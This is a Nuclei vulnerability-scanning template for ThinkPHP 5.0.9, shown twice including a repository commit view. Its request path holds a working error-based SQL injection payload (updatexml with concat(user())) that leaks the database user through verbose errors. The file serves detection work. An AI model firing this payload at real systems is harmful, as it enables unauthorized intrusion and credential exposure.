nuclei-templates/vulnerabilities/thinkphp/thinkphp-509-information-di...

id: thinkphp-509-information-disclosure

info:
  name: ThinkPHP 5.0.9 Information Disclosure
  author: dr_set
  severity: critical
  description: Verbose SQL error message reveals sensitive information including database credentials.
  
  # reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/in-sqlinjection
  
requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "SQLSTATE"
          - "XPATH syntax error"
        condition: and
      - type: status
        status:
          - 500
Added ThinkPHP templates and signature. 2021-01-19 04:16:59 +00:00			`id: thinkphp-509-information-disclosure`

			`info:`
			`name: ThinkPHP 5.0.9 Information Disclosure`
			`author: dr_set`
			`severity: critical`
			`description: Verbose SQL error message reveals sensitive information including database credentials.`

			`# reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/in-sqlinjection`

			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1"`
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
			`- "SQLSTATE"`
			`- "XPATH syntax error"`
			`condition: and`
			`- type: status`
			`status:`
			`- 500`